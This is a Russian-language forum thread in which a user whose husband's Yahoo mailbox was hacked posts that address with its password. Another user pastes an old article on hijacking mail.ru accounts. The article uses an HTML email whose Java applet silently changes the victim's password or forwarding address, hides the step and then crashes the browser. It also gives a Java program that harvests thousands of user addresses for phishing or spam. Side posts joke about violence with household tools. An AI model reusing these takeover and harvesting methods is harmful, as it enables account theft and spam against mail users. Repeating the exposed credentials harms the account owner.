hacking of e-mail address

Хакнули моего мужа. У него был ящик на cleeja@yahoo.com и password clee.Понятия не имею зачем он такой лёгкий сделал.Но обидно,что адреса друзей там остались.Написали тому счастливцу письмо,но боюсь ку-ку в ответ будет.Обидно.:-(

А этот "хакер" все настройки сменил? Типа секретного вопроса и мыла, на которое высылается пароль, когда старый забываешь. Проверьте. У меня пару лет назад тоже какой-то мудак пароль менял на yahoo постоянно.

Ящик оказывается такой древний(лет семь),когда ещё не заморачивались с вопросами безопасности...Похоже с инфо можно попрoщаться...:-(

Ну как это не заморачивались... Всегда существовала система, позволяющая восстановить пароль в случае его потери. Там надо то только ответить на пару вопросов. У меня есть статейка про взлом интерфейсных почтовых систем, правда сам не пробовал :)

Пытались и в yahoo писать и по помощи yahoo работать-никак.Можно ссылку на статью-своё ломать хотим (невесёлый смайлик).

Она на харде у меня. Хотите, на мыло скину. Я не специалист и, честно говоря, не особо въехал :) правда и не старался особо.

Хочу,потому как сама тоже не специалист,но пострадавшая сторона.Можно вот на этот адрес- (будет двоится-читать с olga) olgasja@yahoo.com :-7

Вроде отправил. Прочитал сам - дикая статейка... :) Бедные хакеры :)

Ничего нет...Было пустое сообщение,без слов и адреса.

А мне пришло сообщение об ошибке. Попробую еще раз.

Зачем тебе статьи? Я тебе и так могу рассказать все, что в них пишут. Они тебе не помогут. Единственный выход для тебя - это восстановление через секретный вопрос или дату рождения или что там у вас, не знаю. Может этот чувак забыл там поменять данные. Бывает и и такое, но редко. Так что скорее всего ничего ты не восстановишь. Все методы, описанные в статьях, действуют только если человек не готов к взлому своего ящика, не ждет, что вот-вот его кто-то начнет ломать. А этот чувак ждет, потому-что сам его взломал и ессно готовится, что его начнут ломать обратно. Методами из статей можно будет взломать через некоторое время, когда он подзабудет уже, что то чужой ящик и он его взломал:):):) Если конечно этот чувак будет пользоваться чужим ящиком, как своим, что тоже вряд ли. Скорее всего поиграет и забросит. Короче, если он не дурак, то он защитился. А грамотно защищенный ящик ваще фиг взломаешь. Только если сам сервер будешь ломать. Кстати можешь поискать на хакерских сайтах, может этот ваш яхо уже и взломан нашими умельцами. Как раньше был взломан мейл.ру и любой дурак мог украсть чужое мыло на мейл.ру :):):), имея соответствующую прогу:) Кстати не знаю, как у вас, а у нас взлом сервера карается по закону:) Брось ты это дело. Заведите другой ящик:)

За каким болтом его вообще ломали? Адрес не такой уж и привлекательный, информации важной там нет, это надо среди своих посмотреть.

Да, наверное кто-то из своих. Так этот "кто-то" ведь никогда не признается. Если только ходить ко всем знакомым в гости и шарить у них по компам, так как бы, невзначай:)

А зачем придумали утюг? :)

Вопрос ставит меня в тупик. Не знаю:( Я им не пользуюсь. Зато у меня есть паяльник:) Им можно паять и много чего еще. Полезная вещь в хозяйстве:) Не то, что утюг.

Не знаю,зачем тебе паяльник,им ведь не только паяют,впрочем как и утюгом.:-) Мой муж не то,чтобы наивный,а много верящий в людей человек.Я сразу догадалась,кто взломал ящик,но боюсь,сказав ему встречу стену непонимания...:-( Сейчас вот опять такой смешной пароль поставил,эx...:@)

Не спорю, паяльник тоже нужная штука, как и бейсбольная бита, удавка, железный прут, хотя мне больше по душе кастет... :)

Иногда удар лбом(знаете Депардье такой удар любит в кино показывать) выручает лучше чем кастет...(заговорщицким тоном,к слову о Ваших дел.встречах без кастета).:-)

Да уж... Такие встречи не дай Бог никому :) Раньше я тоже этот удар любил, очень действенный.

Да ну к черту, нифига не отправляется! Лучше я здесь оставлю. В последнее время значительную популярность обрели почтовые системы на основе WWW-Интерфейса ( www.hotmail.com, www.mail.com, www.netscape.net в России - www.mail.ru). Web-почту "местного значения" также предлагают провайдеры, работающие по схемам "Интернет-Кард" или "Интернет-в-кредит". Честно говоря, мне совершенно непонятны причины такого успеха. Сторонники подобных систем обычно заявляют о простоте и удобстве пользования, при большей безопасности, ссылаясь на огромное кол-во вирусов и печальный пример MS Outlook и MS Outlook Express 5. Первые два аргумента, похоже, соответствуют действительности, а о безопасности поговорим чуть ниже. В статье будет рассмотрен один из вариантов технического подхода к вскрытию почтового ящика, основанного на совместном использовании недоработок современных браузеров, принципиальных недостатках CGI, и ошибках в политике безопасности почтовых служб. Именно он чаще всего применяется в атаках на Web-почту. Для "конкретности", будет описан найденый мною метод "захвата" или "подслушивания" пользователя популярной в России системе mail.ru и способ защиты. "Социальная инженерия" (сравнимый по эффективности) вид взлома рассматриваться не будет просто потому, что она детально рассмотрена в статьях других авторов. Существуют, конечно и другие методы, возможно, лучшие, чем описанный ниже. Может, их авторы тоже поделятся своими мыслями в отзывах или напишут статью... 1. Принципиальные недостатки безопасности WWW-почты. (Не)Надежность обычной почтовой програмы определяется (без)грамотностью её написания. Браузер же как система прочтения почты изначально недостаточно безопасен, поэтому создатели почты вынуждены налагать ограничения на теги, используемые в письмах ( Письмо можно сформировать просто присоединением (attach) HTML -файла (в Netscape Messenger, например) содержащего необходимые теги. Присоединенный в Messenger'е HTML-файл mail.ru откроет автоматически. Как только абонент попытается прочитать письмо, выполнится апплет, и через несколько секунд форма будет отослана от имени жертвы. Вот, в принципе, и всё. Пользователю присвоен новый пароль. Если мы хотим "просто подслушивать" пользователя, в значение полей Password необходимо внести 16 звёздочек, а в поле Forward - куда отсылать копии. Это довольно рискованный вариант: пользователь может случайно заглянуть в настройки и заметить адрес. 3. Макияж... Не стоит, конечно, проводить всю эту процедуру перед глазами пользователя ( может он ещё не отключил подтверждение на отправку форм или успеет запомнить разглядеть и запомнить новый пароль). Разумнее переадресовать апплет на какой-нибудь файл содержащий frameset где zastavka маскирует письмо под безобидную рекламу или дружеское письмо, а editprofile выполняется в невидимом фрейме. По окончании смены паролей лучше сымитировать сбой т.к. в течении сеанса пользователь может исправить пароль. В IE под Win 95/98, например, достаточно выполнить скрипт open("javascript:open(window.location)"); приводящий к бесконечному размножению окон, требующему перезагрузки. Само письмо лучше отослать (на случай неудачи) от анонимной службы рассылки писем. ( Смотрите статью "Атака на отказ..."). На 06.01.2002 пример ещё работал. Исходники на www.chat.ru/~avkvladru/mail/ Защититься от этой атаки как всегда просто. Отключить Java, а лучше, отказаться от использования Web-интерфейсов. Тот же mail.ru предлагает и форвардинг и pop-сервера. Экономия на настройке приносит проблемы с безопасностью не только администраторам больших сетей, поверьте. 4. Составляем список абонентов сервера. Заветной мечтой всех спамеров мира является список (база) абонентов. Недаром, в их среде постоянно ходят слухи о каких-то почтовых серверах, поддерживающих команду finger ;). Также пару дней назад на форуме видел очередной крик души ( если таковая ещё жива ;-) : "Нужна база е-мейлов по заграничным и Московским сайтам $$$ - Вася 02:53:36 06/1/2002 (0)" Нередко почтовые Web-сервера могут "бесплатно" предоставить подобную информацию. Метод её получения довольно прост. При легальной работе с почтовым ящиком запоминаем адреса CGI-скриптов, ответственных за смену и чтение параметров пользователей. Потом, вызываем их без параметров (форм). Вполне вероятны ошибки в скриптах, при которых они отработают с последними занесёнными ( или использующимися в текущий момент) именами пользователей. Конечно, шансов на то, что параметры можно изменить нулевые, а вот сообщение об ошибке доступа вполне может содержать имя пользователя, как это происходит на mail.ru. При обращении к тому-же "http://koi.mail.ru/cgi-bin/modifyuser?modify" выдаётся сообщение вида Настройки пользователя mnebojsa@mail.ru Ошибка. Не заполнены необходимые поля. - При следующем обращении "сдастся" следующий пользователь или "@/" если таковых не окажется. Осталось исследовать внутреннюю структуру ответа, да написать программу, повторяющую подобные запросы и фильтрующую ответ в поисках нужной информации. Лучше запускать её в часы пик ------------------------- http://www.chat.ru/~avkvladru/mail/getname.java ------------------------- import java.io.*; import java.net.*; import java.util.*; public class getname { public static void main(String args[]) { String nextline; try { URL mailserv= new URL("http://koi.mail.ru/cgi-bin/modifyuser?modify"); for (int i=1;i<=10000;i++) { DataInputStream input = new DataInputStream ( mailserv.openConnection().getInputStream()); nextline=input.readLine(); nextline=input.readLine(); nextline=input.readLine(); // Нужный нам адрес - в третьей строке // выходного документа System.out.println( nextline); input.close(); } } catch(Exception ioe) { System.out.println(ioe.toString()); } } }; -------------------------------------------------- Вызовы команд вида ( в среде JDK) :javac getname.java - компилируем файл :java getname > userlist.txt занесут в файл userlist.txt примерно 10000 e-mail адресов. Теперь больной манией величия "хаксор" вполне может создать программу, автоматически рассылающую письма-ловушки отбирающие почтовые ящики, практичный спаммер - рекламу, а конкуренты - сообщение, вида: "бесплатный сервис mail.ru будет с начала месяца прекращён, воспользуйтесь xxxx.ru" или всё вместе

Да,это совсем другая планета...:-О Будем работать над вопросом....(вглядывающийся в статью смайлик) Большое спасибо за статью!!! :@)

так тебе и надо:)

Если о тебе кто-то помнит-значит ты ещё не умер!!! :-)